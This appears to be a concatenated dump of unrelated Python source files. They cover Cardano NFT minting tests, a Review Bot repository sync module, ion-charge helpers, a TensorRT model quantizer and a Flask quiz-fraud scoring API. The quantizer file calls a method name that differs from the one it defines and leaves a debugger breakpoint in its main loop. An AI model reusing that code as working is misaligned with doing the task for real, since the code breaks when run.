        # Calculate the minimum amount of lovelace needed to hold the NFT we are going to mint
min_val = min_lovelace(Value(0, my_nft), self.chain_context)
# Send the NFT to our own address
nft_output = TransactionOutput(address, Value(min_val, my_nft))
builder.add_output(nft_output)
# Build and sign transaction
signed_tx = builder.build_and_sign(
[self.payment_skey, self.extended_payment_skey, policy_skey], address
)
print("############### Transaction created ###############")
print(signed_tx)
print(signed_tx.to_cbor())
# Submit signed transaction to the network
print("############### Submitting transaction ###############")
self.chain_context.submit_tx(signed_tx.to_cbor())
self.assert_output(address, nft_output)
nft_to_send = TransactionOutput(
address,
Value(
20000000,
MultiAsset.from_primitive({policy_id.payload: {b"MY_NFT_1": 1}}),
),
)
builder = TransactionBuilder(self.chain_context)
builder.add_input_address(address)
builder.add_output(nft_to_send)
# Create final signed transaction
signed_tx = builder.build_and_sign([self.payment_skey], address)
print("############### Transaction created ###############")
print(signed_tx)
print(signed_tx.to_cbor())
# Submit signed transaction to the network
print("############### Submitting transaction ###############")
self.chain_context.submit_tx(signed_tx.to_cbor())
self.assert_output(address, nft_to_send)
@retry(tries=4, delay=6, backoff=2, jitter=(1, 3))
def test_mint_nft_with_script(self):
address = Address(self.payment_vkey.hash(), network=self.NETWORK)
with open("./plutus_scripts/fortytwo.plutus", "r") as f:
script_hex = f.read()
forty_two_script = cbor2.loads(bytes.fromhex(script_hex))
policy_id = plutus_script_hash(forty_two_script)
my_nft = MultiAsset.from_primitive(
{
policy_id.payload: {
b"MY_SCRIPT_NFT_1": 1, # Name of our NFT1 # Quantity of this NFT
b"MY_SCRIPT_NFT_2": 1, # Name of our NFT2 # Quantity of this NFT
}
}
)
metadata = {
721: {
policy_id.payload.hex(): {
"MY_SCRIPT_NFT_1": {
"description": "This is my first NFT thanks to PyCardano",
"name": "PyCardano NFT example token 1",
"id": 1,
"image": "ipfs://QmRhTTbUrPYEw3mJGGhQqQST9k86v1DPBiTTWJGKDJsVFw",
},
"MY_SCRIPT_NFT_2": {
"description": "This is my second NFT thanks to PyCardano",
"name": "PyCardano NFT example token 2",
"id": 2,
"image": "ipfs://QmRhTTbUrPYEw3mJGGhQqQST9k86v1DPBiTTWJGKDJsVFw",
},
}
}
}
# Place metadata in AuxiliaryData, the format acceptable by a transaction.
auxiliary_data = AuxiliaryData(AlonzoMetadata(metadata=Metadata(metadata)))
# Create a transaction builder
builder = TransactionBuilder(self.chain_context)
# Add our own address as the input address
builder.add_input_address(address)
# Add minting script with an empty datum and a minting redeemer
builder.add_minting_script(
forty_two_script, redeemer=Redeemer(RedeemerTag.MINT, 42)
)
# Set nft we want to mint
builder.mint = my_nft
# Set transaction metadata
builder.auxiliary_data = auxiliary_data
        # Calculate the minimum amount of lovelace needed to hold the NFT we are going to mint
min_val = min_lovelace(Value(0, my_nft), self.chain_context)
# Send the NFT to our own address
nft_output = TransactionOutput(address, Value(min_val, my_nft))
builder.add_output(nft_output)
# Create a collateral
self.fund(address, self.payment_skey, address)
non_nft_utxo = None
for utxo in self.chain_context.utxos(str(address)):
# multi_asset should be empty for collateral utxo
if not utxo.output.amount.multi_asset:
non_nft_utxo = utxo
break
builder.collaterals.append(non_nft_utxo)
# Build and sign transaction
signed_tx = builder.build_and_sign([self.payment_skey], address)
# signed_tx.transaction_witness_set.plutus_data
print("############### Transaction created ###############")
print(signed_tx)
print(signed_tx.to_cbor())
# Submit signed transaction to the network
print("############### Submitting transaction ###############")
self.chain_context.submit_tx(signed_tx.to_cbor())
self.assert_output(address, nft_output)
|
105511
|
def pytest_configure():
import os
os.environ.setdefault('SUPERTOKENS_ENV', 'testing')
os.environ.setdefault('SUPERTOKENS_PATH', '../supertokens-root')
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tests.Django.settings')
|
105538
|
from __future__ import unicode_literals
import os
import appdirs
from reviewbot.config import config
from reviewbot.utils.api import get_api_root
from reviewbot.utils.filesystem import make_tempdir
from reviewbot.utils.log import get_logger
from reviewbot.utils.process import execute
logger = get_logger(__name__)
repositories = {}
class Repository(object):
"""A repository."""
def sync(self):
"""Sync the latest state of the repository."""
pass
class GitRepository(Repository):
"""A git repository."""
def __init__(self, name, clone_path):
"""Initialize the repository.
Args:
name (unicode):
The configured name of the repository.
clone_path (unicode):
The path of the git remote to clone.
"""
self.name = name
self.clone_path = clone_path
self.repo_path = os.path.join(appdirs.site_data_dir('reviewbot'),
'repositories', name)
def sync(self):
"""Sync the latest state of the repository."""
if not os.path.exists(self.repo_path):
os.makedirs(self.repo_path)
logger.info('Cloning repository %s to %s',
self.clone_path, self.repo_path)
execute(['git', 'clone', '--bare', self.clone_path,
self.repo_path])
else:
logger.info('Fetching into existing repository %s',
self.repo_path)
execute(['git', '--git-dir=%s' % self.repo_path, 'fetch',
'origin', '+refs/heads/*:refs/heads/*', '--prune'])
def checkout(self, commit_id):
"""Check out the given commit.
Args:
commit_id (unicode):
The ID of the commit to check out.
Returns:
unicode:
The name of a directory with the given checkout.
"""
workdir = make_tempdir()
branchname = 'br-%s' % commit_id
logger.info('Creating temporary branch for clone in repo %s',
self.repo_path)
execute(['git', '--git-dir=%s' % self.repo_path, 'branch', branchname,
commit_id])
logger.info('Creating working tree for commit ID %s in %s', commit_id,
workdir)
execute(['git', 'clone', '--local', '--no-hardlinks', '--depth', '1',
'--branch', branchname, self.repo_path, workdir])
logger.info('Removing temporary branch for clone in repo %s',
self.repo_path)
execute(['git', '--git-dir=%s' % self.repo_path, 'branch', '-d',
branchname])
return workdir
class HgRepository(Repository):
"""A hg repository."""
def __init__(self, name, clone_path):
"""Initialize the repository.
Args:
name (unicode):
The configured name of the repository.
clone_path (unicode):
The path of the hg repository to clone.
"""
self.name = name
self.clone_path = clone_path
self.repo_path = os.path.join(appdirs.site_data_dir('reviewbot'),
'repositories', name)
def sync(self):
"""Sync the latest state of the repository."""
if not os.path.exists(self.repo_path):
os.makedirs(self.repo_path)
logger.info('Cloning repository %s to %s',
self.clone_path, self.repo_path)
execute(['hg', 'clone', '-U', self.clone_path,
self.repo_path])
else:
logger.info('Pulling into existing repository %s',
self.repo_path)
execute(['hg', '-R', self.repo_path, 'pull'])
def checkout(self, commit_id):
"""Check out the given commit.
Args:
commit_id (unicode):
The ID of the commit to check out.
Returns:
unicode:
The name of a directory with the given checkout.
"""
workdir = make_tempdir()
logger.info('Creating working tree for commit ID %s in %s', commit_id,
workdir)
execute(['hg', '-R', self.repo_path, 'archive', '-r', commit_id,
'-t', 'files', workdir])
return workdir
def fetch_repositories(url, user=None, token=None):
"""Fetch repositories from Review Board.
Args:
url (unicode):
The configured url for the connection.
user (unicode):
The configured user for the connection.
token (unicode):
The configured API token for the user.
"""
logger.info('Fetching repositories from Review Board: %s', url)
root = get_api_root(url=url,
username=user,
api_token=token)
for tool_type in ('Mercurial', 'Git'):
repos = root.get_repositories(tool=tool_type, only_links='',
only_fields='path,mirror_path,name')
for repo in repos.all_items:
repo_source = None
for path in (repo.path, repo.mirror_path):
if (os.path.exists(path) or path.startswith('http') or
path.startswith('git')):
repo_source = path
break
if repo_source:
init_repository(repo.name, tool_type.lower(), repo_source)
else:
logger.warning('Cannot find usable path for repository: %s',
repo.name)
def init_repository(repo_name, repo_type, repo_source):
"""Add repository entry to global list.
Args:
repo_name (unicode):
The name of the repository.
repo_type (unicode):
The type of the repository.
repo_source (unicode):
The source of the repository.
"""
global repositories
if repo_type == 'git':
repositories[repo_name] = \
GitRepository(repo_name, repo_source)
elif repo_type in ('hg', 'mercurial'):
repositories[repo_name] = \
HgRepository(repo_name, repo_source)
else:
logger.error('Unknown type "%s" for configured repository %s',
repo_type, repo_name)
def init_repositories():
"""Set up configured repositories."""
for server in config['reviewboard_servers']:
fetch_repositories(server['url'],
server.get('user'),
server.get('token'))
for repository in config['repositories']:
repo_name = repository['name']
repo_type = repository.get('type')
repo_source = repository['clone_path']
init_repository(repo_name, repo_type, repo_source)
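# A usage sketch (not part of the original module); the repository name and
# clone URL below are illustrative placeholders.
if __name__ == '__main__':
    init_repository('example', 'git', 'https://example.com/example.git')
    repositories['example'].sync()                        # clone or fetch the bare repo
    workdir = repositories['example'].checkout('main')    # working tree for a ref
    print(workdir)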
|
105570
|
from .pylspm import PyLSpm
from .results import PyLSpmHTML
from .boot import PyLSboot
from .rebus import rebus
from .blindfolding import blindfolding
from .bootstraping import bootstrap
from .mga import mga
from .gac import gac
from .pso import pso
from .tabu2 import tabu
from .permuta import permuta
from .plsr2 import plsr2, HOCcat
from .monteCholesky import monteCholesky
from .adequacy import *
from .test_heuristic import *
from .fimix import fimixPLS
from .imputation import Imputer
|
105578
|
from typing import Tuple
from enum import Enum
class NeutralChargeRule(Enum):
"""
Strict enumeration of different methods to maintain charge neutrality for single residues.
"""
# Ions will not be used to neutralize system. This means OpenMM will add a neutralizing background charge.
NO_IONS = 0
# Inserted ions will be countered, and removed ions will be accompanied by removing a counter charge.
COUNTER_IONS = 1
# Removed charges will be replaced, and added charges will replace a charge in solvent.
REPLACEMENT_IONS = 2
def choose_neutralizing_ions_by_method(
reference_state_charge: int, to_state_charge: int, rule: NeutralChargeRule
) -> Tuple[int, int]:
"""Pick ions using specific rule for single residue changes.
Notes
-----
To ensure consistency, for multiple changes, calculate result for individual residues separately and sum up the
delta ion results.
Parameters
----------
reference_state_charge - The charge of a reference state (assumed to be charge neutral)
to_state_charge - Charge of a state that needs to be neutralized according to rule.
    rule - The rule (see ``NeutralChargeRule``) used to determine ionic changes.
Returns
-------
delta_cations, delta_anions
"""
# No ions
if rule is NeutralChargeRule.NO_IONS:
return 0, 0
# Add or remove a counter charge
elif rule is NeutralChargeRule.COUNTER_IONS:
return _delta_ions_by_counter_charge(reference_state_charge, to_state_charge)
# Add or remove a replacement charge
elif rule is NeutralChargeRule.REPLACEMENT_IONS:
return _delta_ions_by_replacement_charge(
reference_state_charge, to_state_charge
)
def _delta_ions_by_counter_charge(
reference_state_charge: int, to_state_charge: int
) -> Tuple[int, int]:
"""Calculate the change in ionic composition between titration states using counter ion.
Parameters
----------
    reference_state_charge - The charge of a single reference state (assumed to be charge neutral).
    to_state_charge - Charge of the state that needs to be neutralized.
"""
delta_cation = 0
delta_anion = 0
charge_to_counter = to_state_charge - reference_state_charge
counter = 0
while abs(charge_to_counter) > 0:
# The protonation state change annihilates a positive charge
if (reference_state_charge > 0 >= to_state_charge) or (
0 < to_state_charge < reference_state_charge
):
# annihilate a solvent anion
delta_anion -= 1
charge_to_counter += 1
reference_state_charge -= (
1
) # One part of the initial charge has been countered
# The protonation state change annihilates a negative charge
elif reference_state_charge < 0 <= to_state_charge or (
0 > to_state_charge > reference_state_charge
):
# annihilate a solvent cation
delta_cation -= 1
charge_to_counter -= 1
reference_state_charge += 1
# The protonation state change adds a negative charge
elif reference_state_charge == 0 > to_state_charge or (
0 > reference_state_charge > to_state_charge
):
# add a positive charge
delta_cation += 1
charge_to_counter += 1
reference_state_charge -= 1
# The protonation state adds a positive charge
elif (reference_state_charge == 0 < to_state_charge) or (
0 < reference_state_charge < to_state_charge
):
# add an anion
delta_anion += 1
charge_to_counter -= 1
reference_state_charge += 1
else:
raise ValueError("Impossible scenario reached.")
counter += 1
if counter > 10000:
raise RuntimeError(
"Infinite while loop predicted for salt resolution. Halting."
)
return delta_cation, delta_anion
def _delta_ions_by_replacement_charge(
reference_state_charge: int, to_state_charge: int
) -> Tuple[int, int]:
"""Calculate the change in ionic composition between titration states by adding replacement ion.
N.B.: This is similar to the approach employed by <NAME> Roux 2015. TODO add reference.
"""
# Note that we don't allow for direct transitions between ions of different charge.
delta_cation = 0
delta_anion = 0
charge_to_counter = to_state_charge - reference_state_charge
counter = 0
while abs(charge_to_counter) > 0:
# The protonation state change annihilates a positive charge
if (reference_state_charge > 0 >= to_state_charge) or (
0 < to_state_charge < reference_state_charge
):
delta_cation += 1
charge_to_counter += 1
reference_state_charge -= (
1
) # One part of the initial charge has been countered
# The protonation state change annihilates a negative charge
elif reference_state_charge < 0 <= to_state_charge or (
0 > to_state_charge > reference_state_charge
):
delta_anion += 1
charge_to_counter -= 1
reference_state_charge += 1
# The protonation state change adds a negative charge
elif reference_state_charge == 0 > to_state_charge or (
0 > reference_state_charge > to_state_charge
):
delta_anion -= 1
charge_to_counter += 1
reference_state_charge -= 1
# The protonation state adds a positive charge
elif (reference_state_charge == 0 < to_state_charge) or (
0 < reference_state_charge < to_state_charge
):
# remove cation
delta_cation -= 1
charge_to_counter -= 1
reference_state_charge += 1
else:
raise ValueError("Impossible scenario reached.")
counter += 1
if counter > 10000:
raise RuntimeError(
"Infinite while loop predicted for salt resolution. Halting."
)
return delta_cation, delta_anion
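# A small usage sketch (not part of the original module): neutralize a residue
# whose charge changes from 0 to +1 under each of the rules defined above.
if __name__ == "__main__":
    for rule in NeutralChargeRule:
        delta_cations, delta_anions = choose_neutralizing_ions_by_method(0, 1, rule)
        print(rule.name, delta_cations, delta_anions)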
|
105602
|
import operator
from typing import List
import torch
from torch.fx import GraphModule
import mqbench.nn.qat as qnnqat
from mqbench.utils.logger import logger
from mqbench.utils.registry import register_model_quantizer
from mqbench.prepare_by_platform import BackendType
from mqbench.custom_quantizer import ModelQuantizer
class TRTModelQuantizer(ModelQuantizer):
"""The different points of TRT quantizer are how to deal with add op
and the last layer.
"""
def __init__(self, extra_quantizer_dict, extra_fuse_dict):
super().__init__(extra_quantizer_dict, extra_fuse_dict)
@property
def _merge_add_type(self):
return (torch.nn.Conv2d, torch.nn.Linear)
def _find_act_quants(self, model: GraphModule) -> set:
nodes = list(model.graph.nodes)
modules = dict(model.named_modules())
node_need_to_quantize_output = []
for node in nodes:
if ((node.op == "call_module" and node.target in self.exclude_module_name) or
((node.op == 'call_function' or node.op == 'call_method') and
node.target in self.exclude_function_type) or
node.name in self.exclude_node_name) and node.name not in self.additional_node_name:
continue
if (node.op == "call_module" and isinstance(modules[node.target], self.module_type_to_quant_input)) or \
((node.op == 'call_function' or node.op == 'call_method') and
node.target in self.function_type_to_quant_input) or node.name in self.additional_node_name:
# Add will be merged with previous conv.
input_node_list = list(filter(lambda x: isinstance(x, torch.fx.node.Node),
self._flatten_args(node.args)))
if node.target is operator.add:
merge_node = self._find_add_merge_node(model, input_node_list, node)
if merge_node:
input_node_list.remove(merge_node)
node_need_to_quantize_output.extend(input_node_list)
else:
for _node in input_node_list:
if self._is_implicit_merge(modules, (node, _node)):
continue
if isinstance(_node, torch.fx.node.Node):
node_need_to_quantize_output.append(_node)
return node_need_to_quantize_output
def _find_add_merge_node(self, model, input_node_list, node):
"""Find the first input node which has only one successor from the last.
        This kind of node can be merged with add.
"""
input_node_list.reverse()
modules = dict(model.named_modules())
for input_node in input_node_list:
if input_node.op == 'call_module' and type(modules[input_node.target]) in self._merge_add_type:
succ = 0
for _node in list(model.graph.nodes):
_node_input_list = self._flatten_args(_node.args)
if input_node in _node_input_list:
succ += 1
if succ == 1:
return input_node
return None
@register_model_quantizer(BackendType.Tensorrt_NLP)
class TensorrtNLPQuantizer(ModelQuantizer):
"""
NLP model quantizer for Tensorrt settings.
    We should quantize Linear / Embedding weights, as well as
    Linear / Matmul / Add layer inputs (activations).
    We notice that the embedding add (word + pos + token_type) is not
    quantized, so we find and skip it.
    Add in MSA (add mask) should not be quantized either; we skip it
    via implicit_merge.
"""
@property
def implicit_merge_patterns(self) -> list:
# Layers which do not need quantize among them.
# In reversed order!
return [
(operator.add, operator.mul),
# Add in MSA block should not be quantized.
(operator.add, operator.truediv)
]
@property
def function_type_to_quant_input(self) -> list:
return [
operator.add,
# Matmul in MSA
torch.matmul
] + self.additional_function_type
@property
def module_type_to_quant_input(self) -> tuple:
return (
# Linear
torch.nn.qat.modules.linear.Linear,
) + self.additional_module_type
def _find_act_quants(self, model: GraphModule) -> List:
nodes = list(model.graph.nodes)
modules = dict(model.named_modules())
node_need_to_quantize_output = []
for node in nodes:
if ((node.op == "call_module" and node.target in self.exclude_module_name) or
((node.op == "call_function" or node.op == "all_method") and
node.target in self.exclude_function_type) or
node.name in self.exclude_node_name) and node.name not in self.additional_node_name:
logger.info("Exclude skip: {}".format(node.name))
continue
if (node.op == "call_module" and isinstance(modules[node.target], self.module_type_to_quant_input)) or \
((node.op == "call_function" or node.op == "call_method") and
node.target in self.function_type_to_quant_input) or node.name in self.additional_node_name:
input_node_list = self._flatten_args(node.args)
# Means this is not Tensor + Tensor.
if not all([isinstance(_node, torch.fx.node.Node) for _node in input_node_list]):
continue
# Embedding Add and MSA mask Add should be skipped.
if node.op == "call_function" and node.target == operator.add and \
self._is_skiped_add(node, modules, input_node_list):
continue
if node.op == "call_function" and node.target == operator.add:
import pdb
pdb.set_trace()
for _node in input_node_list:
if self._is_implicit_merge(modules, (node, _node)):
logger.info("Implicit merge: {} + {}".format(_node.name, node.name))
continue
node_need_to_quantize_output.append(_node)
return node_need_to_quantize_output
    def _is_skipped_add(self, node, modules, input_node_list):
        for _node in input_node_list:
            if _node.op == "call_module" and isinstance(modules[_node.target], (qnnqat.Embedding, torch.nn.Embedding)):
                logger.info("Skip embedding add: {}".format(node.name))
                return True
        return False
|
105620
|
from gmtpy import GMT
gmt = GMT( config={'BASEMAP_TYPE':'fancy'})
gmt.pscoast( R='5/15/52/58', # region
J='B10/55/55/60/10c', # projection
B='4g4', # grid
D='f', # resolution
S=(114,159,207), # wet fill color
G=(233,185,110), # dry fill color
W='thinnest' ) # shoreline pen
gmt.save('example1.pdf')
gmt.save('example1.eps')
|
105643
|
import logging
import numpy as np
from typing import Dict, List, Tuple
from transformers import PreTrainedTokenizer
from transformers.tokenization_utils_base import BatchEncoding
class RstPreprocessor:
"""
Class for preprocessing a list of raw texts to a batch of tensors.
"""
def __init__(
self,
tokenizer: PreTrainedTokenizer = None
):
if tokenizer is not None:
self.tokenizer = tokenizer
else:
try:
import nltk
self.tokenizer = nltk.word_tokenize
except ModuleNotFoundError:
logging.warning('The package "nltk" is not installed!')
logging.warning('Please install "nltk" with "pip install nltk"')
def __call__(self, sentences: List[str]):
"""
Main method to start preprocessing for RST.
Args:
sentences (List[str]): list of input texts
Returns:
            Tuple: the ELMo character-id tensor, the tokenized sentences, and a list
            with the number of tokens in each text of the batch.
"""
tokenized_sentences = [np.array(self.tokenizer(sentence)) for sentence in sentences]
character_ids, sentence_lengths = self.get_elmo_char_ids(tokenized_sentences)
return character_ids, tokenized_sentences, sentence_lengths
def get_elmo_char_ids(self, tokenized_sentences: List[str]):
"""
        Method to get ELMo character ids for a batch of tokenized texts.
        Args:
            tokenized_sentences (List): list of tokenized input texts
        Returns:
            Tuple: the ELMo character-id tensor and a list with the number of
            tokens in each text
"""
from allennlp.modules.elmo import batch_to_ids
sentence_lengths = [len(data) for data in tokenized_sentences]
character_ids = batch_to_ids(tokenized_sentences)
return character_ids, sentence_lengths
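# --- Illustrative usage sketch (an editorial addition, not part of the original
# module). It assumes nltk (with its tokenizer data) and allennlp are installed,
# since the default tokenizer and get_elmo_char_ids depend on them.
def _example_rst_preprocessing():
    preprocessor = RstPreprocessor()
    character_ids, tokenized, lengths = preprocessor(["Hello world.", "Another sentence."])
    print(lengths)              # number of tokens per sentence
    print(character_ids.shape)  # ELMo character-id tensor returned by batch_to_ids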
|
105655
|
import errno
import os
import random
import socket
import time
import unittest
import docker.client
from sourced.ml.core.utils.bblfsh import BBLFSH_VERSION_HIGH, BBLFSH_VERSION_LOW, check_version
@unittest.skipIf(os.getenv("SKIP_BBLFSH_UTILS_TESTS", False), "Skip ml_core.utils.bblfsh tests.")
class BblfshUtilsTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.docker_client = docker.from_env()
# ensure docker is running
try:
cls.docker_client.containers.list()
except Exception:
raise Exception("docker not running properly")
cls.er_msg = "supported bblfshd versions: " \
">=%s,<%s" % (BBLFSH_VERSION_LOW, BBLFSH_VERSION_HIGH)
def __check_bblfsh_version_support(self, version: str) -> bool:
"""
:param version: version of bblfshd to check
:return: True if version is supported, False otherwise
"""
with socket.socket() as s:
for _ in range(3):
try:
port = random.randint(10000, 50000)
s.connect(("localhost", port))
except socket.error as e:
if e.errno == errno.ECONNREFUSED:
break
container = self.docker_client.containers.run(
image="bblfsh/bblfshd:%s" % version,
privileged=True,
detach=True,
ports={"9432": port},
)
assert container is not None, "failed to create bblfsh container"
            res = False
            for _ in range(10):
try:
res = check_version(port=port)
break
except Exception:
time.sleep(.1)
pass
container.stop()
container.remove()
return res
def test_v200(self):
self.assertFalse(self.__check_bblfsh_version_support("v2.0.0"), self.er_msg)
def test_v210(self):
self.assertFalse(self.__check_bblfsh_version_support("v2.1.0"), self.er_msg)
def test_v220(self):
self.assertTrue(self.__check_bblfsh_version_support("v2.2.0"), self.er_msg)
def test_v230(self):
self.assertTrue(self.__check_bblfsh_version_support("v2.3.0"), self.er_msg)
def test_v240(self):
self.assertTrue(self.__check_bblfsh_version_support("v2.4.0"), self.er_msg)
def test_v250(self):
self.assertTrue(self.__check_bblfsh_version_support("v2.5.0"), self.er_msg)
@classmethod
def tearDownClass(cls):
cls.docker_client.close()
if __name__ == "__main__":
unittest.main()
|
105669
|
from decimal import Decimal
from typing import Iterable, Optional, TypeVar
from stock_indicators._cslib import CsIndicator
from stock_indicators._cstypes import List as CsList
from stock_indicators._cstypes import Decimal as CsDecimal
from stock_indicators._cstypes import to_pydecimal
from stock_indicators.indicators.common.helpers import RemoveWarmupMixin
from stock_indicators.indicators.common.results import IndicatorResults, ResultBase
from stock_indicators.indicators.common.quote import Quote
def get_kama(quotes: Iterable[Quote], er_periods: int = 10,
fast_periods: int = 2, slow_periods: int = 30):
"""Get KAMA calculated.
    Kaufman’s Adaptive Moving Average (KAMA) is a volatility-adaptive
    moving average of Close price over configurable lookback periods.
Parameters:
`quotes` : Iterable[Quote]
Historical price quotes.
`er_periods` : int, defaults 10
Number of Efficiency Ratio (volatility) periods.
`fast_periods` : int, defaults 2
Number of periods in the Fast EMA.
`slow_periods` : int, defaults 30
Number of periods in the Slow EMA.
Returns:
`KAMAResults[KAMAResult]`
        KAMAResults is a list of KAMAResult, providing useful helper methods.
See more:
- [KAMA Reference](https://daveskender.github.io/Stock.Indicators.Python/indicators/Kama/#content)
- [Helper Methods](https://daveskender.github.io/Stock.Indicators.Python/utilities/#content)
"""
results = CsIndicator.GetKama[Quote](CsList(Quote, quotes), er_periods,
fast_periods, slow_periods)
return KAMAResults(results, KAMAResult)
class KAMAResult(ResultBase):
"""
A wrapper class for a single unit of Kaufman’s Adaptive Moving Average (KAMA) results.
"""
@property
def efficiency_ratio(self) -> Optional[float]:
return self._csdata.ER
@efficiency_ratio.setter
def efficiency_ratio(self, value):
self._csdata.ER = value
@property
def kama(self) -> Optional[Decimal]:
return to_pydecimal(self._csdata.Kama)
@kama.setter
def kama(self, value):
self._csdata.Kama = CsDecimal(value)
_T = TypeVar("_T", bound=KAMAResult)
class KAMAResults(RemoveWarmupMixin, IndicatorResults[_T]):
"""
A wrapper class for the list of Kaufman’s Adaptive Moving Average (KAMA) results.
    It is exactly the same as the built-in `list`, except that it provides
    some useful helper methods written in the C# implementation.
"""
|
105702
|
from bluesky import Msg
from bluesky.callbacks.olog import logbook_cb_factory
text = []
def f(**kwargs):
text.append(kwargs['text'])
def test_default_template(RE):
text.clear()
RE.subscribe(logbook_cb_factory(f), 'start')
RE([Msg('open_run', plan_args={}), Msg('close_run')])
assert len(text[0]) > 0
def test_trivial_template(RE):
text.clear()
RE.subscribe(logbook_cb_factory(f, desc_template='hello'), 'start')
RE([Msg('open_run', plan_args={}), Msg('close_run')])
assert text[0] == 'hello'
# smoke test the long_template
RE.subscribe(logbook_cb_factory(f, long_template='hello'), 'start')
RE([Msg('open_run', plan_args={}), Msg('close_run')])
def test_template_dispatch(RE):
disp = {'a': 'A', 'b': 'B'}
text.clear()
RE.subscribe(logbook_cb_factory(f, desc_dispatch=disp), 'start')
RE([Msg('open_run', plan_name='a', plan_args={}),
Msg('close_run')])
RE([Msg('open_run', plan_name='b', plan_args={}),
Msg('close_run')])
assert text[0] == 'A'
assert text[1] == 'B'
# smoke test the long_dispatch
RE.subscribe(logbook_cb_factory(f, long_dispatch=disp), 'start')
RE([Msg('open_run', plan_name='a', plan_args={}),
Msg('close_run')])
RE([Msg('open_run', plan_name='b', plan_args={}),
Msg('close_run')])
|
105704
|
from unittest import TestCase
from pykalman.sqrt import BiermanKalmanFilter
from pykalman.tests.test_standard import KalmanFilterTests
from pykalman.datasets import load_robot
class BiermanKalmanFilterTestSuite(TestCase, KalmanFilterTests):
"""Run Kalman Filter tests on the UDU' Decomposition-based Kalman Filter"""
def setUp(self):
self.KF = BiermanKalmanFilter
self.data = load_robot()
|
105733
|
import flask
import os
from dotenv import load_dotenv
from pathlib import Path
import sys
sys.path.append('fraud_graph/')
import fraud_times.quiz_statistics as quiz_stats
import fraud_times.quiz_orm as quiz_orm
import get_scores as get_scores
import create_dataset2 as create_dataset
import json
# Does not override existing env vars, so docker-compose can set them when run; otherwise they are loaded from the .env file
load_dotenv()
app = flask.Flask(__name__)
@app.route('/time/quiz/<quizId>')
def quizFraudScores(quizId):
db = quiz_orm.QuizzesDBConnector()
quiz = db.get_quiz(quizId)
statistic = quiz_stats.Quiz_Statistic(
quiz, quiz_stats.QUIZ_SCORERS["Diff. Mean (Question ID)"])
result = {"scores": [{"userInfo": db.getAuthUserInformationByUserId(user_id).to_dict(), "score": user_score}
for user_id, user_score in statistic.statistic.items()]}
return flask.jsonify(result)
@app.route('/communication/quiz/<quizId>')
def quizFraudScoresGraph(quizId):
data = create_dataset.create_dataset(quizId, "*")
scores_in, scores_out = get_scores.create_network(
"All", data, True, True, 1)
db = quiz_orm.QuizzesDBConnector()
scores_in = [{"userInfo": db.getAuthUserInformationByUsername(username).to_dict(), "score": user_score}
for username, user_score in scores_in.items()]
scores_out = [{"userInfo": db.getAuthUserInformationByUsername(username).to_dict(), "score": user_score}
for username, user_score in scores_out.items()]
return flask.jsonify({"scoresIn": scores_in, "scoresOut": scores_out})
|
105749
|
from django.core import mail
from django.test.utils import override_settings
from base.tests.base import SeleniumTestCase
CAPTCHA = 'test'
@override_settings(CAPTCHA=CAPTCHA)
class ContactFormTest(SeleniumTestCase):
def test_contact_form(self):
self.assertEqual(mail.outbox, [])
username = 'john'
usermail = '<EMAIL>'
message = 'this is a message'
self.navigate('base:contact_form')
username_textfield = self.driver.find_element_by_name('name')
username_textfield.send_keys(username)
mail_textfield = self.driver.find_element_by_name('email')
mail_textfield.send_keys(usermail)
message_textarea = self.driver.find_element_by_name('body')
message_textarea.send_keys(message)
message_textarea = self.driver.find_element_by_name('captcha')
message_textarea.send_keys(CAPTCHA)
with self.wait():
message_textarea.submit()
self.assert_view('base:contact_form_sent')
self.assertEqual(len(mail.outbox), 1)
body: mail.EmailMessage = mail.outbox[0].body
self.assertIn(username, body)
self.assertIn(message, body)
self.assertIn(usermail, body)
|
105766
|
import re
from collections import deque
def parse(script):
"""Parse Nuke node's TCL script string into nested list structure
Args:
script (str): Node knobs TCL script string
Returns:
        Tablet: A list containing knob script lines, or tab knobs that have
            been parsed into nested lists
"""
queue = deque(script.split("\n"))
tab = Tablet()
tab.consume(queue)
return tab
TYPE_NODE = 0
TYPE_KNOBS = 1
TYPE_GROUP = -2
TYPE_KNOBS_CLOSE = -1
TYPE_GROUP_CLOSE = -3
TAB_PATTERN = re.compile(
'addUserKnob {20 '
'(?P<name>\\S+)'
'(| l (?P<label>".*"|\\S+))'
'(| n (?P<type>1|-[1-3]))'
'}'
)
class Tablet(list):
"""
"""
def __init__(self, name=None, label=None, type=None, parent=None):
self.name = name
self.label = label
self.type = type
self.parent = parent
self[:] = list()
self.tab_closed = False
self.not_in_group = type is not None and type != TYPE_GROUP
def __eq__(self, other):
return "@" + self.name == other
def find_tab(self, name):
"""Return child tab if exists in list"""
return next((item for item in self if item == "@" + name), None)
def consume(self, queue):
"""
"""
def under_root():
return getattr(self.parent, "parent", None) is not None
def ignore_tab_value(name):
if queue and queue[0] == "%s 1" % name:
queue.popleft()
while queue:
line = queue.popleft()
if not line:
continue
matched = TAB_PATTERN.search(line)
if matched:
tab_profile = matched.groupdict()
name = tab_profile["name"]
label = tab_profile["label"]
type = int(tab_profile["type"] or 0)
else:
self.append(line)
continue
ignore_tab_value(name)
if type in (TYPE_KNOBS_CLOSE, TYPE_GROUP_CLOSE):
self.parent.tab_closed = True
return
elif type == TYPE_NODE:
if self.not_in_group:
queue.appendleft(line)
return
tab = Tablet(name, label, type=type, parent=self)
self.append(tab)
tab.consume(queue)
if self.tab_closed and under_root():
return
def merge(self, other):
"""
"""
for item in other:
if isinstance(item, Tablet):
tab = self.find_tab(item.name)
if tab is not None:
tab.merge(item)
continue
self.append(item)
def to_script(self, join=True):
"""
"""
script = list()
for item in self:
if isinstance(item, Tablet):
sub_script = item.to_script(join=False)
line = "addUserKnob {20 " + item.name
if item.label is not None:
line += " l " + item.label
if item.type == TYPE_NODE:
sub_script.insert(0, line + "}")
elif item.type == TYPE_KNOBS:
sub_script.insert(0, line + " n 1}")
sub_script.append(line + " n -1}")
elif item.type == TYPE_GROUP:
sub_script.insert(0, line + " n -2}")
sub_script.append(line + " n -3}")
script += sub_script
continue
script.append(item)
return "\n".join(script) if join else script
|
105775
|
from __future__ import print_function
import sys
import cv2
import pdb
import argparse
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
from torch.autograd import Variable
import torch.nn.functional as F
import time
from utils.io import mkdir_p
from utils.util_flow import write_flow, save_pfm
from utils.flowlib import point_vec, warp_flow
cudnn.benchmark = False
parser = argparse.ArgumentParser(description='VCN+expansion')
parser.add_argument('--dataset', default='2015',
help='KITTI version')
